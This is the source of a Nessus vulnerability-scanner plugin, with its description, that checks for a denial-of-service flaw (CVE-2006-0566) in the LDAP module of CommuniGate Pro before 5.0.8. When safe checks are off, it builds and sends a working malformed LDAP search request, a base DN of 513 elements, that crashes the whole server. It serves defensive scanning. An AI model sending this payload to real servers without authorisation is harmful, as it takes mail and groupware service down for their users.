CommuniGate Pro Server < 5.0.8 LDAP Module Field Handling Remote DoS

2006-02-13T00:00:00
ID COMMUNIGATEPRO_508_LDAP_DOS.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote host appears to be running CommuniGate Pro, a commercial email and groupware application.

The version of CommuniGate Pro installed on the remote host includes an LDAP server that fails to handle search requests whose base Distinguished Name (DN) contains too many elements. An unauthenticated remote attacker can leverage this issue to crash not just the LDAP server but the entire CommuniGate Pro application on the remote host.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(20889);
  script_version("1.21");
  script_cvs_date("Date: 2018/11/15 20:50:26");

  # Public identifiers for the flaw this plugin tests.
  script_cve_id("CVE-2006-0566");
  script_bugtraq_id(16501);

  script_name(english:"CommuniGate Pro Server < 5.0.8 LDAP Module Field Handling Remote DoS");
  script_summary(english:"Checks for denial of service vulnerability in CommuniGate Pro < 5.0.8 LDAP module");
 
  script_set_attribute(attribute:"synopsis", value:
"The remote application is prone to denial of service attacks.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be running CommuniGate Pro, a commercial
email and groupware application. 

The version of CommuniGate Pro installed on the remote host includes
an LDAP server that fails to handle requests with Distinguished 
Names (DNs) that contain too many elements.  A user can leverage this 
issue to crash not just the LDAP server, but also the entire 
application on the remote host.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2006/Feb/54");
  script_set_attribute(attribute:"see_also", value:"http://www.stalker.com/CommuniGatePro/History.html");
  script_set_attribute(attribute:"solution", value:"Upgrade to CommuniGate Pro version 5.0.8 or later.");
  # AV:N/Au:N: reachable over the network with no credentials; A:P: availability
  # impact only (no confidentiality/integrity impact is claimed).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/02/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/02/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:communigate:communigate_pro_core_server");
  script_end_attributes();
 
  # ACT_MIXED_ATTACK: the body below is a harmless banner check when safe
  # checks are enabled and a destructive crash attempt when they are not.
  script_category(ACT_MIXED_ATTACK);
  script_family(english:"Windows");
  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  # The SMTP banner supplies the version string; LDAP detection supplies the
  # port that the active check targets.
  script_dependencies("smtpserver_detect.nasl", "ldap_detect.nasl");
  script_require_ports("Services/smtp", 25, "Services/ldap", 389);

  exit(0);
}


include("global_settings.inc");
include("smtp_func.inc");


# Resolve the LDAP and SMTP ports recorded by the detection plugins, falling
# back to the well-known defaults, and stop unless both are open.
ldap_port = get_kb_item("Services/ldap");
if (!ldap_port) ldap_port = 389;
smtp_port = get_kb_item("Services/smtp");
if (!smtp_port) smtp_port = 25;
if (!get_port_state(ldap_port) || !get_port_state(smtp_port)) exit(0);

# The SMTP greeting is the only place the product version is advertised.
banner = get_smtp_banner(port:smtp_port);

# Unless the scan is paranoid, require the banner to identify CommuniGate Pro
# before going any further -- the active branch of this plugin is a crash
# attempt, so it should not be aimed at an unrelated LDAP server.
if (report_paranoia < 2 && (!banner || "ESMTP CommuniGate Pro" >!< banner)) exit(0);


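# Encode a BER length in the two-byte long form (0x82 hi lo).  Every length
# in the request below is far under 64 KiB, and this is exactly the form the
# original hand-counted packet used, so the bytes on the wire are unchanged.
function ber_len(len)
{
  return raw_string(0x82, (len >> 8) & 0xff, len & 0xff);
}

# With safe checks enabled, only the version in the SMTP banner is consulted.
if (safe_checks()) {
  # Vulnerable: every 0.x-4.x release and 5.0.0 through 5.0.7.  The trailing
  # ($|[^0-9]) stops "5\.0\.[0-7]" from also matching a 5.0.1x banner.
  if (
    banner &&
    egrep(pattern:"^220 .* CommuniGate Pro ([0-4]\.|5\.0\.[0-7]($|[^0-9]))", string:banner)
  ) {
    report = string(
      "Nessus has determined the flaw exists with the application\n",
      "simply by looking at the version in the SMTP banner.\n"
    );

    security_warning(port:ldap_port, extra:report);
    exit(0);
  }
}
# Otherwise send the malformed search and see whether the service survives.
# NOTE: per the advisory, a vulnerable host loses the whole CommuniGate Pro
# application, not just its LDAP module -- this is why the plugin is
# ACT_MIXED_ATTACK and only reaches this branch with safe checks off.
else {
  # Base DN with far more RDN elements than the vulnerable module can handle.
  # All BER lengths are derived from the payload, so this count can be tuned
  # without re-counting bytes by hand.
  n_elements = 513;
  base_dn = "dc=" + crap(data:",", length:n_elements) + "dc=example,dc=com";

  # SearchRequest body (RFC 4511 section 4.5.1) without its own tag/length.
  search =
    raw_string(0x04) + ber_len(len:strlen(base_dn)) + base_dn +  # baseObject
    raw_string(
      0x0a, 0x01, 0x02,                  #   scope: wholeSubtree
      0x0a, 0x01, 0x00,                  #   derefAliases: neverDerefAliases
      0x02, 0x01, 0x00,                  #   sizeLimit: 0 (none)
      0x02, 0x01, 0x00,                  #   timeLimit: 0 (none)
      0x01, 0x01, 0x00,                  #   typesOnly: FALSE
      0xa2, 0x05, 0x87, 0x03             #   filter: (!(foo=*))
    ) + "foo" +
    raw_string(0x30, 0x00);              #   attributes: empty list

  # LDAPMessage { messageID 1, protocolOp searchRequest }.
  op  = raw_string(0x02, 0x01, 0x01, 0x63) + ber_len(len:strlen(search)) + search;
  req = raw_string(0x30) + ber_len(len:strlen(op)) + op;

  # Open a socket and send the request.
  soc = open_sock_tcp(ldap_port);
  if (soc) {
    send(socket:soc, data:req);
    res = recv(socket:soc, length:1024);
    close(soc);

    # No reply means either a crash or a silent close of our connection; a
    # failed reconnect tells the two apart.  A momentary connection failure
    # right after the probe would still be reported, so treat the result as
    # strong but not conclusive evidence.
    if (res == NULL) {
      soc2 = open_sock_tcp(ldap_port);
      if (!soc2) {
        security_warning(ldap_port);
        exit(0);
      }
      else close(soc2);
    }
  }
}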